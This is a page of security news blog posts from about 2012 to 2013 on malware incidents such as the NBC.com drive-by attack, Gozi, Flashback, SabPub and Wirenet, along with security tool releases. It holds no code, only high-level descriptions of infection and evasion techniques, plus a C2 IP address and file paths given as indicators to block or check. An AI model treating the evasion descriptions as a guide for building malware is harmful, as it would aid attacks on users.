Showing posts sorted by date for query PDF. Sort by relevance Show all posts
Showing posts sorted by date for query PDF. Sort by relevance Show all posts

NBC.com Compromised, Hackers Exploited The Website to Spread Malware

Posted by Avik Sarkar On 2/25/2013 02:07:00 pm

NBC.com Compromised, Hackers Exploited The Website to Spread Malware

The month of February is still going from bad to worse for the cyber domain, in this very month cyber criminals swallowed the security system of many giant companies like Facebook, Twitter, Apple, New York Times and many more. But the game is not over yet, as we have just passed a few weeks, when the attack on NY Times took place, which stolen the employ database; yet again the cyber criminals have targeted another media giant National Broadcasting Company widely known as NBC. During the attack, hackers have successfully gain access inside the server of NBC and planted malware, in order to harm innocent readers. Famous security expert and blogger Brian Krebs said that the hackers inserted code into the NBC.com homepage. This caused visiting browsers to load pages from third-party sites that were compromised. While explaining the nature of the attacker, Krebs said; "The compromised sites tried to foist the Citadel Trojan, a variant of the Zeus Trojan." The Zeus is a "sophisticated data theft tool that steals passwords and allows attackers to control machines remotely" he added. Not only the NBC’s home page, also several others were affected, including the pages of late night talk show hosts Jay Leno and Jimmy Fallon. Well known security firm Sophos explained how roughly attack played out, and how NBC got sucked into the equation:
  • NBC's hacked pages were altered to add some malicious JavaScript that ran in your browser.
  • The JavaScript injected an additional HTML component known as an IFRAME (inline frame) into the web page.
  • The IFRAME sucked in further malicious content from websites infected with an exploit kit known as RedKit.
  • The exploit kit delivered one of two exploit files to try to take control over your browser via a Java vulnerability or a PDF bug.
  • If the exploit worked on your computer, financially-related crimeware from the Citadel or ZeroAccess families was installed.
This, of course, is an example of a dreaded drive-by download, where the crooks use a cascade of tricks to download, install and execute software without going through any of the warnings or confirmation dialog you might expect. This, in turn, means that even if you are a careful and well-informed user, you may end up in trouble, since there are no obvious signs that you are doing anything risky, or even unexpected.
As soon as this story get spotted the American commercial broadcasting television network, NBC News reported and confirmed that its site had been attacked. The broadcaster released the following statement regarding the website: "We've identified the problem and are working to resolve it. No user information has been compromised."
The emergency response team immediately take the situation under control and restored the website, and confirmed that the site is back again and completely safe for its visitors. But so far there is no evidence of attackers who were involved in this attack. For the safety of VOGH readers we would like to recommend you to update your operating systems and browser plugins. Also note that the attack on NBC was similar to many that have occurred in recent years in that the malicious sites tried to exploit vulnerabilities in Java. So it will better to disable Java, unless it is that much necessary. So stay tuned with VOGH and be safe in the cyber domain. 






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

3 Russian Cyber Criminal Who Was The Master Mind of Banking Trojan 'Gozi' Charged in New York

Posted by Avik Sarkar On 2/01/2013 08:53:00 pm

3 Russian Cyber Criminal Who Was The Master Mind of Banking Trojan 'Gozi' Charged in New York 

Yet again another serious issue of cyber crime get resolved when the FBI tracked and figured out the master mind of infamous 'Gozi banking Trojan' which effected more than millions of system world wide, including a handful at NASA, leading to tens of millions of dollars in lost banking funds and damages to computer systems and networks. Three alleged international cyber criminals from Russia, responsible for creating and distributing 'Gozi' that infected over one million computers and caused tens of millions of dollars in losses charged in Manhattan Federal Court. Mihai Ionut Paunescu aged 28, a Romanian, Deniss Calovskis, 27, a Latvian, and Nikita Vladimirovich Kuzmin, 25, of the Russian Federation, are charged with computer intrusion, conspiracy to commit bank and wire fraud and access device fraud. Federal authorities said the three were arrested last week; Kuzmin is being held in New York, while Paunescu is in custody in Romania and Calovskis in Latvia. 
According to the press release of FBI -Deniss Calovskis, a/k/a “Miami,” a Latvian national who allegedly wrote some of the computer code that made the Gozi virus so effective, was arrested in Latvia in November 2012. Mihai Ionut Paunescu, a/k/a “Virus,” a Romanian national who allegedly ran a “bulletproof hosting” service that enabled cyber criminals to distribute the Gozi virus, the Zeus trojan, and other notorious malware and to conduct other sophisticated cyber crimes, was arrested in Romania in December 2012. 

The cases are being handled by the Complex Frauds Unit of the United States Attorney’s Office. Assistant United States Attorneys Sarah Lai, Nicole Friedlander, and Thomas G.A. Brown, along with Trial Attorney Carol Sipperly of the Computer Crime and Intellectual Property Section of the Department of Justice on the Paunescu case, are in charge of the prosecution. The charges contained in the Indictments are merely accusations, and the defendants are presumed innocent unless and until proven guilty.

DefendantAge and ResidenceChargesMaximum Penalty
Nikita Kuzmin25; Moscow, RussiaConspiracy to commit bank fraud; bank fraud; conspiracy to commit access device fraud; access device fraud; conspiracy to commit computer intrusion; computer intrusion95 years in prison
Deniss Calovskis27; Riga, LatviaConspiracy to commit bank fraud; conspiracy to commit access device fraud; conspiracy to commit computer intrusion; conspiracy to commit wire fraud; conspiracy to commit aggravated identity theft67 years in prison
Mihai Ionut Paunescu28; Bucharest, RomaniaConspiracy to commit computer intrusion; conspiracy to commit bank fraud; conspiracy to commit wire fraud60 years in prison


Brief About Gozi:-
The Gozi virus is malicious computer code, or “malware,” that steals personal bank account information, including usernames and passwords, from the users of affected computers. It was named by private sector information security experts in the U.S. who, in 2007, discovered that previously unrecognized malware was stealing personal bank account information from computers across Europe on a vast scale, while remaining virtually undetectable in the computers it infected. To date, the Gozi virus has infected over one million victim computers worldwide, among them at least 40,000 computers in the U.S., including computers belonging to the National Aeronautics and Space Administration (NASA), as well as computers in Germany, Great Britain, Poland, France, Finland, Italy, Turkey, and elsewhere, and it has caused tens of millions of dollars in losses to the individuals, businesses, and government entities whose computers were infected.

The Gozi virus was distributed to victims’ computers in several different ways. In one method, the virus was disguised as an apparently benign .pdf document which, when opened, secretly installed the Gozi virus on the victim’s computer. Once installed, the Gozi virus—which was intentionally designed to be undetectable by anti-virus software—collected data from the infected computer in order to capture personal bank account information including usernames and passwords. That data was then transmitted to various computer servers controlled by the cyber criminals who used the Gozi virus. These cyber criminals then used the personal bank account information to transfer funds out of the victims’ bank accounts and ultimately into their own personal possession.


For Detailed Information Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website

Posted by Avik Sarkar On 12/05/2012 07:33:00 pm

'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website

Researcher at F-Secure blog has identified that A new piece of malicious software targeted at Apple users has been found on a website dedicated to the Dalai Lama. According to blog post by F-Secure -the website related to Dalai Lama is fully compromised and is pushing new Mac malware, called Dockster, using a Java-based exploit. Dockster tries to infect computers by exploiting a vulnerability in Java, CVE-2012-0507. The vulnerability is the same one used by the Flashback malware, which first appeared around September 2011 and infected as many as 600,000 computers via a drive-by download. Flashback was used to fraudulently click on advertisements in order to generate illicit revenue in a type of scam known as click fraud. Apple patched the vulnerability in Java in early April and then undertook a series of steps to remove the frequently targeted application from Macs. Apple stopped bundling Java in the 10.7 version of its Lion operation system, which continued with the company's Mountain Lion release. In October, Apple removed older Java browser plug-ins in a software update.
But still the matter of relief is that current versions of OS X are not vulnerable; users who have disabled the Java browser plug-in are also not vulnerable. F-Secure researcher Sean Sullivan said Dockster is “a basic backdoor with file download and keylogger capabilities.” Meanwhile F-Secure’s Sullivan, also said that the Dalai Lama’s site is also serving a Windows-based exploit for CVE-2012-4681, the Agent.AXMO Trojan. The Trojan exploits a Java vulnerability that allows remote code execution using a malicious applet that is capable of bypassing the Java SecurityManager. 

Please Note That: The gyalwarinpoche.com site doesn't seem to be as "official" as dalailama.com

While talking about Mac malware, then you must remember that earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten"targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal information. In the very decent past we have seen a trojan named 'BackDoor.Wirenet.1'  apparently providing its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers like ChromeChromium,Firefox and Opera. For any kind of cyber updates and infose news, stay tuned with VOGH.





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Kaspersky Releases Linux Mail Security With Anti-malware, Anti-spam & Content Filtering

Posted by Avik Sarkar On 9/09/2012 12:59:00 am

Kaspersky Releases Linux Mail Security With Anti-malware, Anti-spam & Content Filtering 

Russian anti virus firm & security giant  Kaspersky Lab has released an anti-spam and anti-malware application called Linux Mail Security which can be integrated into different type of Linux-based mail server to fight spam and block malicious attachments. The latest spam-fighting features – including Reputation Filtering and Enforced Anti-Spam Updates Service  help to filter out zero-hour spam, while our new ZetaShield technology helps to shield businesses from zero-day and targeted attacks. Designed for integration with a range of Linux-based mail systems, Kaspersky Linux Mail Security delivers the security, flexibility and ease of management that businesses and ISPs demand. 

Key Features:- 
  • Advanced antivirus engine- Kaspersky Linux Mail Security includes the latest version of Kaspersky Lab’s award-winning antivirus engine – with behaviour stream signatures – to help detect and remove malicious attachments from incoming emails.

  • Zero-Day Exploit and Targeted Attack (ZETA) Shield- Kaspersky’s ZetaShield offers protection against unknown malware and exploits – to defend you from zero-day and zero-hour attacks and APTs (Advanced Persistent Threats).

Powerful Anti-Spam Engine- Kaspersky Linux Mail Security provides the latest version of Kaspersky’s anti-spam engine – including two powerful new technologies:
  • Enforced Anti-Spam Updates Service – uses push technology, directly from the Kaspersky cloud, to deliver real-time updates. By reducing the ‘update window’ from 20 minutes to approximately 1 minute, the Enforced Anti-Spam Updates Service helps to defend businesses against zero-hour spam and spam epidemics.
  • Cloud-assisted Reputation Filtering – fights against unknown spam, to enhance the spam capture rate and reduce the number of false positives.

Kaspersky Security Network -The cloud-based Kaspersky Security Network (KSN) gathers data from millions of participating users’ systems around the world to help defend your system from the very latest viruses and malware attacks. Potential threats are monitored and analysed – in real-time – to help block dangerous actions, before harm is caused.
Attachment filtering- The new Format Recogniser feature can filter attachments – using information about file type, name and message size. This helps businesses to enforce their email usage policy and can help to address corporate liability issues that can arise when users try to distribute illegal music or video files via the corporate email system.
Improved!Global Blacklists and Whitelists- In addition to creating corporate blacklists or whitelists, administrators can manage ‘allowed’ or ‘denied’ senders email – using IPv4 and IPv6, wildcards and regular expressions.
Personal Blacklists and Whitelists- Users also can create their own blacklists and whitelists.
Backup and personal backup with flexible search -Blocked email is quarantined in a backup system. If the system uses Microsoft Active Directory or OpenLDAP, individual users can access their personal backup via the web so they’re less likely to need to call your helpdesk.
Integration with most popular MTAs (Postfix, Sendmail, Exim, qmail and CommunigatePro)- Kaspersky Linux Mail Security lets you select the method of integration, depending on your choice of Mail Transfer Agent (MTA) – so you can integrate as a filter or using a Milter API.
Antivirus command line file scanner- The Kaspersky Anti-Virus On-Demand Scanner can be used for on-demand virus checking of objects – which can include directories, regular files and devices such as hard drives, flash drives and DVD-ROMs.
Amavisd-new- Kaspersky Linux Mail Security supports integration with Linux mail systems using the high-performance AMaViS interface.
Monitoring and Reporting features- 

  • SNMP (Simple Network Management Protocol) support – any type of event can be monitored using SNMP events and traps
  • A new dashboard gives an at-a-glance view of status and monitoring
  • Detailed, flexible reporting in PDF format – for customisable reports that help in the monitoring and analysis of security and policies
  • Notification system – informs administrators and document owners about policy violation incidents
  • Detailed logs – on all product actions, to help in identifying problems

Easy to deploy, maintain and manage- 

  • System administrators can run manual updates or set the rules for fully automatic updates of antivirus, anti-spam and ZetaShield
  • Integration with Active Directory and OpenLDAP
  • Rich email traffic management rules – administrators can create rules according to corporate security policies
  • IPv6 support
  • Scalable architecture – the entire system can be easily migrated from a test server to a production environment
Kaspersky Linux Mail Security will support the following Linux distributions - Red Hat Enterprise Linux 6.2 Server, Fedora 16, SUSE Linux Enterprise Server 11 SP2, Debian GNU/Linux 6.0.4 Squeeze, CentOS 6.2, openSUSE Linux 12.1, Ubuntu 10.04 LTS; 12.04 LTS, Mandriva Enterprise Server 5.2, FreeBSD 8.3, 9.0, Canaima 3.0, Asianux 4 SP1. 


For Detailed Information Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

'BackDoor.Wirenet.1' Trojan Stealing Passwords From Mac & Linux Based Systems

Posted by Avik Sarkar On 9/04/2012 03:34:00 pm


'BackDoor.Wirenet.1' Trojan Stealing  Passwords From Mac & Linux Based Systems

A Russian Anti Virus software company named 'Dr Web' has spotted a piece of malware that unusually targeting Macs and Linux-based systems is causing a world of trouble for those in its path. The newly found mlaware dubbed 'BackDoor.Wirenet.1' apparently providing its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers like Chrome, Chromium, Firefox and Opera. Furthermore, it’s also able to obtain passwords from popular applications including SeaMonkey, Pidgin and Thunderbird. Even if you don’t use any of the above mentioned software, you’re still in danger as a keylogger is bundled in the payload. Wirenet.1 installs itself into the user's home directory using the name WIFIADAPT

There are some steps that can be taken right away if you think you could be infected. Dr. Web is quick to point out that their anti-virus software will keep you protected. Another option is to simply disable communication with the control server used by the code’s author. In this case, blocking communication with IP address 212.7.208.65 should do the trick.  

Earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten"targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal information




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

KDE 4.9 Released With Improved Stability & Performance

Posted by Avik Sarkar On 8/09/2012 05:04:00 am

KDE 4.9 Released With Improved Stability & Performance

Earlier in January we got KDE 4.8, so after eight moths of wait now the KDE Developers team has announced its latest set of releases, providing major updates to KDE Plasma Workspaces, KDE Applications, and the KDE Platform. Version 4.9 provides many new features, along with improved stability and performance. This release is dedicated to the memory of KDE contributor Claire Lotion. Claire's vibrant personality and enthusiasm were an inspiration to many in many opensource community, and her pioneering work on the format. The KDE Quality Team was set up earlier this year with a goal to improve the general levels of quality and stability in KDE software. Special attention was given to identifying and fixing regressions from previous releases. This was a top priority because it ensures improvement with each release. As a result of the efforts of the KDE Quality Team, the 4.9 Releases are the best ever.
One particular bugfix deserves special attention. An Okular bug reported in 2007 had gotten nearly 1100 votes; it was important to many users. They complained about making annotations and not being able to save or print them. With the assistance of many commenters and people on the Okular IRC channel, Fabio D’Urso implemented a solution that allows Okular PDF document annotations to be saved and printed. The fix required some work on KDE libraries and attention to overall design to ensure that non-PDF documents worked right. 

The most notable include:-
  • The Dolphin file manager includes back and forward buttons, inline file renaming, and the ability to show metadata like ratings, tags, image size, file size, date, and more. You can also sort files by these metadata properties, which is awesome. It also includes a better Places panel, improved search, and better integration with the Terminal.
  • The Konsole terminal now includes the ability to change directory when you drag and drop a folder into the window, detach tabs by dragging them out of the window, and more.
  • Activities, the feature that helps you separate your work from your play, is now a bit more powerful, letting you link certain files to each workspace. You can also encrypt certain activities for more private work.
  • The KWin window manager now has better performance all around, as well as a few improvements here and there with certain effects like Wobby Windows.

To Download KDE 4.9 Click Here

-Source (KDE & lh)





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

OpenVAS - Vulnerability Scanning & Management Tool Version 5 Released

Posted by Avik Sarkar On 5/12/2012 09:52:00 pm

OpenVAS Vulnerability Scanning & Management Tool Version 5 Released With New Asset-Management, Delta-Reports & Embedded SCAP-Data

The project development team of OpenVAS has declared the availability of its open source vulnerability assessment system version 5th. Almost after one year OpenVAS-4 the fifth version of the tool for vulnerability scanning and management offers several new features. At the same time the number of freely available vulnerability checks has increased to over 25,000.  

New Features:-
  • Delta reports to analyse differences between two scans.
  • Security Information Database: Integrated SCAP data (CPE, CVE) including update method via feed service.
  • Integrated Asset Management.
  • Configuration object 'Port Lists' for transparent TCP/UDP port ranges.
  • Prognostic scans based on asset data and current SCAP data.
  • Support for individual time zones for users.
  • Support for obeservers (granting read-only access)
  • Support for notes/overrides lifetimes.
  • Trashcan for collecting removed items before ultimate deletion.
  • Container tasks for importing reports.
  • SSH port for Local Security Checks configurable.
  • Product detections as reported by Scanner are handled to allow detailed cross-referenced detection informati 20
  • Support for sorting results by CVSS score.
  • Support for importing results sent through the XML escalator.
  • Support for escalating result to a Sourcefire Defense Center.
  • Support for using an SSH key pair for SSH authentication.
  • Individual user settings, starting with time zone.
  • Display single result details.
  • Icon indicators for detected operating systems.
  • LDAP per-user authentication method.
Improved Features:-
  • Updated builtin Report Format Plugins HTML, Text and LaTeX/PDF to reflect various new features that are already present in GSA, including delta and prognostic reports.
  • Product detection information in results XML.
  • Performance for massiv scanner results by using transaction groups.
  • Import of Target lists to allow comma-separated, line-by-line lists.
  • Support for large database files on 32-bit platforms.
Changed Features:-
  • The user interface design of the web interface has been updated.
  • Report format signatures no longer contain user editable fields. Thus, users can change comments without loosing validity of plugins.
  • The max_host and max_checks scan performance parameters have been moved from scan configs to tasks.
  • Security: Enforces strict permissions on sensitive OpenVAS Manager files.
  • Security: Drop privileges before executing report format plugins if running with elevated privileges. 
Source code and binaries for OpenVAS-5 are available to download from the project's site. 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LibreOffice 3.5.3 Final Arrives, 60+ Bugs Have Been Fixed

Posted by Avik Sarkar On 5/03/2012 12:35:00 pm

LibreOffice 3.5.3 Final Arrives, 60+ Bugs Have Been Fixed 

The Document Foundation announces LibreOffice 3.5.3, the fourth version of the 3.5 family. LibreOffice 3.5.3 provides additional stability to corporate and individual users of the best free office suite ever. As expected, the new stable release adds no new features, instead fixing more than 60 bugs found in the core of the program. These include problems when importing PDF, PPTX, RTF and DOCX files, as well as a crashing bug.
Highlighted Features:-
  • Calc performance improvements
  • Lightproof improvements
  • Collaborative spreadsheet editing using Telepathy
  • A Microsoft Publisher import filter
  • A signed PDF export
  • A smartphone remote control
  • A new UI for picking templates
  • A Java based GUI for an Android viewer
  • An improved Impress SVG export filter
  • Tooling for more and better tests
The distribution for Windows is an international build, so you can choose the user interface language that you prefer. Help content is available via an online service, or alternatively as a separate install. For Windows users that have LibreOffice prior to version 3.4.5 installed, either uninstall that beforehand, or upgrade to 3.4.5. Otherwise, the upgrade to 3.5.2 may fail. LibreOffice contains all the security fixes from OpenOffice.org in 3.3.0, and perhaps more as a side-effect of the code clean-ups. Microsoft Office 2010 will complain that ODF 1.2 and extended documents written by LibreOffice 3.5 are invalid (but opens them still). This is a shortcoming in MSO2010 only supporting ODF 1.1, please see here for further details. 

To Download LibreOffice Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Anontune - New Social Music Platform By #Anonymous

Posted by Avik Sarkar On 4/23/2012 12:48:00 pm

Anontune - New Social Music Platform By #Anonymous 

After the launch of AnonBin, alternative of PasteBin now hacktvist group is reportedly putting together a social music platform that will surely ruffle the RIAA's feathers. The project is called Anontune, and is designed to pull songs from third-party sources like YouTube. Users can throw the songs into playlists and share them with friends. The Anontune service relies on executing a Java applet. "Unless you are extremely trusting or using VMWare, you should think very carefully about running code on your machine that was written by members of Anonymous,"

They insist that Anontune will not host copyrighted material and will not be streaming music or offering downloads of copyrighted material. Instead, they plan to focus on information and they compare the platform to a search engine. "The information can be used to play and centralize pervasive music across the Internet on one platform." It's unclear exactly how this site will operate, but Anonymous seems to think that the law will be on their side this.  "The idea is that if all songs were easily accessible and centralized on one user-friendly platform that it would be possible to hijack all current users of music piracy solutions," Anonymous describes in an Anontune white paper (pdf).



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers

Posted by Avik Sarkar On 4/22/2012 02:21:00 pm

Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers

Massive Flashback botnet that hit more than 60K Mac PC world wide originated from hacked and malware-rigged WordPress blog sites. Researchers figure out there were between 30,000 and 100,000 WordPress sites infected in late February and early March, 85% of which are in the United States.
Kaspersky Lab researchers say the infected WordPress blog sites were rigged with code that silently redirected visitors to a malicious server. "When the connection was made to the malicious server, that server would determine which OS was running and serve exploits accordingly," says Roel Schouwenberg, senior researcher for Kaspersky. It was a pay-per-install scheme to spread malware, including the Flashback Trojan.
Most researchers say a gradual decline in machines infected by the Trojan is still underway: As of Thursday, there were about 140,000 infected Macs still out there, according to Symantec, and Kaspersky says it sees only about 30,629 Flashback-infected bots in its sinkhole. Still on the horizon, too, is the possibility of a Flashback comeback, with the command-and-control servers sending their bots updates. "We are watching the command-and-control domains used to control this botnet for any updates ... We haven't seen any new updates being delivered," said Liam O Murchu, manager of operations for Symantec Security Response. "Flashback generates new domains every day, which shows us the attackers have probably written malicious code before. They are aware that their botnet could be taken down with a single domain, so they generate a new one every day." To see the full story click here


Earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten" targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal informations.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Another Mac Trojan "Backdoor.OSX.SabPub" Discovered, Exploiting Java Vulnerability

Posted by Avik Sarkar On 4/20/2012 11:17:00 pm

Another Mac Trojan "Backdoor.OSX.SabPub" Discovered, Exploiting Java Vulnerability 
Few weeks ago security experts found Flashback Trojan infected more than 60,000 Mac users around the world. Immediately after this incident Apple issued patches that curb the vulnerability. Yet again it has been found that another Mac trojan that is also spread through Java exploits. The malware, called Backdoor.OSX.SabPub, can take screen-shots of a user’s current session, execute commands on an infected machine and connect to a remote website to transmit the data. It is not clear how users get infected with the trojan, but because of the low number of instances and the trojan’s backdoor functionality, Securelist speculates that it is most likely used in targeted attacks, possibly launched through emails containing a URL pointing to two one of websites hosting the exploit. Two versions of SabPub were discovered in the wild this past weekend, flying undedected for about two months now. Kaspersky's Costin Raiu wrote in a blog post that SabPub was probably written by the LuckyCat authors.
Version 1: Microsoft Office
One version of SabPub traps Mac (and potentially Windows) users with booby-trapped Microsoft Word documents which exploit the vulnerability 'MSWord.CVE-2009-00563.a.'
The spear-phishing emails containment a malicious Word attachment entitled '10thMarch Statemnet' (with typo) to Tibet sympathizers. March 10, 2011 refers to the day the Dalai Lama delivered his annual speech observing the Tibetan Uprising of 1959. The Word doc was created in August 2010 and updated in February with SabPub thrown in; "quite normal" for such attacks and seen in other APT's like Duqu, Raiu notes.
Version 2: Java
A March version of Sabpub also discovered last weekend exploits the same drive-by Java vulnerability seen in Flashback, one of the biggest botnet attacks seen in OS X. Once the backdoor Trojan is downloaded, a victim's system is connected to a command-and-control center via HTTP. From there the botnet can grab screenshots, upload/download files, and remotely execute commands, Sophos' Graham Cluley writes. SabPub drops the following two files on a user's system, so if you are concerned about infection Cluley recommends searching for these files:
/Users//Library/Preferences/com.apple.PubSabAgent.pfile
/Users//Library/LaunchAgents/com.apple.PubSabAGent.plist

Earlier also Mac users faced such attacks where OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten" targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal informations. 


-Source (Securelist & PC Mag)




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Cyber-War 2.0!! Bangladeshi Hackers Again Targeting Indian Cyber Fence

Posted by Avik Sarkar On 3/02/2012 07:09:00 pm

Cyber-War 2.0!! Bangladeshi Hackers Again Targeting Indian Cyber Fence 

Last month almost every media was busy while covering the story of Cyber-War between Bangladesh & India. The readers of VOGH get the full coverage of that issue. Earlier attack caused maximum damage (NIC, BSF, Stock Market, Media, Govt Sites, Political Party's Website & many other important & high profile sites) for India because all the attacks are coming from Bangladeshi side. Later hackers from BD stopped the attack and unofficially postponed the cyber-war. In our Magazine we have exposed the untold story of the entire issue. Being a media we did our job to raise awareness and as expected we get maximum support from all the peace lovers from the both countries. 
But now again Bangladesh Cyber Army restarted the so called cyber war, or you can call it Cyber-War 2.0. In your magazine we did maximum criticism of that very issue but it seems BCA either did not have much time to go through that PDF or just continuing the same bull shit stuff for Negative Publicity (The main object of this entire issue). So yet again they have blown more than 55 Indian sites to resend their message to Indian Govt & Indian Hackers Communities. 

VOGH Review:- 
But like earlier we are again standing against this issue, because we know what these hackers are looking for and what are the main object of engaging cyber attack & that is fake publicity stunt or you can say negative publicity. While fulfilling their bloody object they are just harassing and disturbing the cyber space which indeed causing serious problem for common people 


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Flashback.G Trojan Targeting Mac Users While Stealing Passwords

Posted by Avik Sarkar On 2/26/2012 10:44:00 pm

 Flashback.G Trojan Targeting Mac Users While Stealing Passwords
Remember earlier MAC Security Blog reported that the latest version, Flashback.D, has gotten a bit sneakier. First, it checks to see if the user is running Mac OS X in VMware Fusion. If so, it does not execute. It does this because many malware researchers test malware in virtual machines, rather than infect full installations, as it is easier to delete them and start over with clean copies. This means that security researchers analyzing and looking for this malware need to be running regular Macs.
 Yet again Mac users became the victim of another trojan. This new Trojan virus is capable of infecting their computers and stealing passwords to services such as Google, PayPal, online banking & so on. This virus is using a new installation method When a user visits a crafted web page, the new variant either tries to exploit two old security vulnerabilities or deploys a Java Applet which tries to trick the user into believing it has been certified by Apple. According to Mac Security Blog (Intego):- This new variant of the Flashback Trojan horse uses three methods to infect Macs. The malware first tries to install itself using one of two Java vulnerabilities. If this is successful, users will be infected with no intervention. If these vulnerabilities are not available – if the Macs have Java up to date – then it attempts a third method of installation, trying to fool users through a social engineering trick. The applet displays a self-signed certificate, claiming to be issued by Apple. Most users won’t understand what this means, and click on Continue to allow the installation to continue.
It is worth noting that Flashback.G will not install if VirusBarrier X6 is present, or if a number of other security programs are installed on the Mac in question. It does this to avoid detection. It seems that the malware writers feel it is best to avoid Macs where the malware might be detected, and focus on the many that aren’t protected.
Earlier also Mac users faced such attacks where OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten" targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal informations.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

VOGH Release III | CYb3r-W4r #Unseen & #Uncut -3rd Magazine Of Voice of Greyhat

Posted by Avik Sarkar On 2/20/2012 09:58:00 pm

VOGH Release III | CYb3r-W4r #Unseen & #Uncut 3rd Magazine Of Voice of Greyhat

Cyber-War Cyber-War Cyber-War!!! I am sure that all of you must be feeling boar of hearing this term for so many times. Since last couple of weeks Cyber-War between Bangladesh & India was on the highest node. Not only security experts, hackers but also those who does not belongs to this world also been aware of what was going on. After seeing so many drama we decided to make the scenario  clear in-front of all of you. So VOGH published their third magazine named "VOGH Release III | CYb3r-W4r #Unseen & #Uncut"

VOGH Release III | CYb3r-W4r #Unseen & #Uncut Contents:- 
  • Introduction
  • Brief Of Cyber-War & Hidden Object of It
  • Redirection
  • An Unexpected  End
  • Summary
  • Responsibility Of Media
  • Responsibility Of Government 
  • VOGH Message to Every Hackers Of the World



 


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Nessus 5.0 Vulnerability Scanner Released

Posted by Avik Sarkar On 2/18/2012 12:23:00 am

Nessus 5.0 Vulnerability Scanner Released 

Tenable Network Security officially announced the availability of Nessus 5.0 vulnerability scanner. This release introduces key features and improvements, separated into the four major phases of the vulnerability scanning process:
  1. Installation and management (for enhanced usability)
  2. Scan policy creation and design (for improved effectiveness)
  3. Scan execution (for improved efficiency)
  4. Report customization and creation (for improved communication with all parts of the organization).
Installation & Management:-
Nessus 5.0 simplifies the installation and configuration for non-technical users:
  • Installation: Nessus v5.0 has a browser-based installation wizard — no special knowledge required. Users on a wide variety of platforms — Windows, Mac, Linux, or UNIX — can have Nessus v5.0 installed within minutes.
  • Configuration and management: Nessus v5.0 configuration and management is now done 100% through the GUI.
  • With all configuration and management now done through the web interface, the Nessus user experience is the same for all users, regardless of OS.
  • With the touch of a button on the GUI, Nessus users can now quickly initiate plugin updates and see last update information.

Scan Policy Creation & Design:-
Users now enjoy improved effectiveness when creating scan policies:
  • Over two dozen new pre-built plugin filters make it easy for security and compliance professionals to simplify policy creation for laser-focused scans on the areas that matter most. Users can quickly select multiple filter criteria, such as, Vulnerability Publication Date, public vulnerability database ID (OSVDB, Bugtraq, CERT Advisory, and Secunia), Plugin type (local or remote), information assurance vulnerability alert (IAVA), and more, to quickly identify easily-exploitable vulnerabilities. For example:
  • Scan for all easily remotely-exploitable vulnerabilities for which there is an exploit published in your favorite exploit framework.
  • Scan for local third-party client software that is unpatched.
  • Scan for systems that have been missing patches for more than a year.
  • Policies can be configured to produce reports that are locked to prevent editing.
Scan Execution: Improved efficiency:-
Nessus 5.0 users can take advantage of real-time scan results, on-the-fly filtering and sorting, and streamlined results navigation:
  • New criticality level: Nessus v5.0 now has five severity levels — Informational, Low Risk, Medium Risk, High Risk, and Critical Risk. The Informational level quickly identifies non-vulnerability information and separates it from the vulnerability detail.
  • Example: A user may want to run a query against all hosts running web servers not on the normal http or https ports, port 80 or port 443. The Informational level allows a user to quickly identify information that may be useful, but does not require immediate attention — keeping the focus on the actionable results.
  • New vulnerability summary: A new vulnerability summary and redesigned host summary make it easy to see risk level without even running a report.
  • Streamlined results navigation: One click to jump from a critical vulnerability to see the host(s) that is vulnerable to the details of the vulnerability.
  • Take advantage of real-time results: As the scan is being run, not only can you see the results as they are being gathered, but navigate and filter on them as well. This allows you to easily act upon the vulnerability data while the scan is happening.

Report Customization:-
New reporting features allow for improved communication of vulnerability results with all parts of the organization:
  • Results filtering and report creation: Results filtering and report creation is more flexible than ever before. Users can apply multiple result filtering criteria, and targeted reports can be generated against the filtered results.
  • Create reports that contain only exploitable vulnerabilities, multiple risk levels (e.g., only show critical and high risk findings), filter on CVE or Bugtraq ID, plugin name, and more!
  • Reports customized by audience: Reports can be customized for executives, systems administrators, or auditors. A user can exclude particular vulnerabilities from a report before it is generated, allowing delivery of results targeted to specific audiences.
